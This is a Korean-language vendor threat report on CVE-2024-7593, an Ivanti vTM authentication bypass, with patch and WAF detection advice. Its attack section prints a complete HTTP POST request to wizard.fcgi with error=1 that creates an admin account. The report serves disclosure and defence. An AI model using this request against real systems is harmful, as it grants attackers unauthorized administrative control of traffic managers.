[2025년 3월 취약점 보고서] Ivanti vTM Authentication Bypass | MONITORAPP

Threat Intelligence Report

웹 애플리케이션 취약성, 공격, 대응 방안에 대한 최신 정보를 확인하세요.

Threat Intelligence Report 메인페이지로 돌아가기

[2025년 3월 취약점 보고서] Ivanti vTM Authentication Bypass

[2025.03 Vulnerability Report] Ivanti vTM Authentication Bypass

이 취약점은 IvantivTM의 인증 우회 취약점으로, 공격자가 웹 인터페이스 내의 모든 섹션에 대해 로드 가능한 마법사.cgi에 대한 접근 제어를 우회하여 임의의 관리자 계정을 생성할 수 있습니다.

이 취약점은 IvantivTM 버전 22.2R1, 22.7R2 등에서 패치되었으며, AIWAF는 2235를 추가하여 대응하고 있습니다: Ivanti vTM 인증 우회 패턴을 2025년 2월 패턴 업데이트에 추가하고 관련 취약점을 지속적으로 모니터링하고 있습니다.

1. 개요

Ivanti vTM(Virtual Traffic Manager)는 소프트웨어 기반 Application Delivery Controller(ADC)로, 최근 해당 플랫폼에서 발견된 인증 우회 취약점인 CVE-2024-7593에 대해 분석한 내용을 정리하였습니다.

image.png

출처 : https://thehackernews.com/2024/10/ivanti-endpoint-manager-flaw-actively.html

2. 공격 유형

CVE-2024-7593은 Ivanti vTM에서 발생한 인증 우회 취약점으로, 해당 제품의 인증 알고리즘의 결함으로 웹 인터페이스 내 모든 Section에 대한 로드가 가능한 wizard.cgi에 대한 접근 제어를 우회하여 임의 관리자 계정을 생성합니다.

공격자는 wizard.cgi에 대한 접근 제어를 우회하기 위해 해당 Endpoint로 전송하는 요청의 파라미터 중 error 파라미터 값을 1로 설정하여 wizard.cgi에 대한 접근 제어를 우회할 수 있습니다.

이후 section 파라미터를 통해 계정 생성을 위한 Section을 불러오고, 이후 해당 요청의 Body에 CSRF 방지 대책에 걸리지 않도록 _form_submitted=form 설정 및 관리자 계정 생성 요청이라는 의미의 create_user=Create, 관리자 계정 생성 정보 등을 입력하여 요청을 전송합니다.

접근 제어를 우회하여 관리자 계정을 생성하는 공격 Request :

POST /apps/zxtm/wizard.fcgi?error=1&section=Access Management:LocalUsers HTTP/1.1
Content-Length: 108
Content-Type: application/x-www-form-urlencoded
Host: www.test.com
User-Agent: HTTPie
​
_form%2Bsubmitted=form&create_user=Create&group=admin&newusername=attacker&password1=hacker&password2=hacker

 

 

 

3. 대응 방안

Ivanti vTM에서는 CVE-2024-7593에 대한 패치를 발표하였기에 해당 제품 사용자는 아래 사진과 같이 각 버전 별 특정 버전 이상으로 패치하여 대응하여야 하며, 저희 AIWAF 제품에서는 2025년 2월 패턴 업데이트에 추가된 2235: Ivanti vTM Authentication Bypass 패턴을 통해 대응하고 있습니다.

image.png

출처 : https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593

4. 결론

Ivanti vTM는 복잡한 IT 환경을 가진 대기업에서 주로 사용되는 제품으로, CVSS 점수가 무려 9.8로 식별되었기 때문에 CISA에서는 빠르게 '긴급 패치 목록'에 해당되는 KEV에 해당 취약점을 등록하였습니다.

또한 OSINT 서비스 중 하나인 fofa.info에 따르면 외부로 공개된 vTM 시스템이 2025년 3월 기준 260건 이상 존재하여, 해당 제품들은 CVE-2024-7593 취약점에 대한 공격 대상이 될 수 있기에 빠르게 최신 버전으로 패치를 진행하여야 합니다.

image.png

출처 : https://en.fofa.info/result?qbase64=YXBwPSJWaXJ0dWFsLVRyYWZmaWMtTWFuYWdlciI%3D

저희 AIWAF 제품에서는 Ivanti 제품에서 발생하는 취약점들에 대해 패턴을 개발하여 대응하고 있으며, 앞으로도 발견되는 관련 취약점들에 대해서도 신속하게 대응할 예정입니다.

5. 참고

 

Scroll Up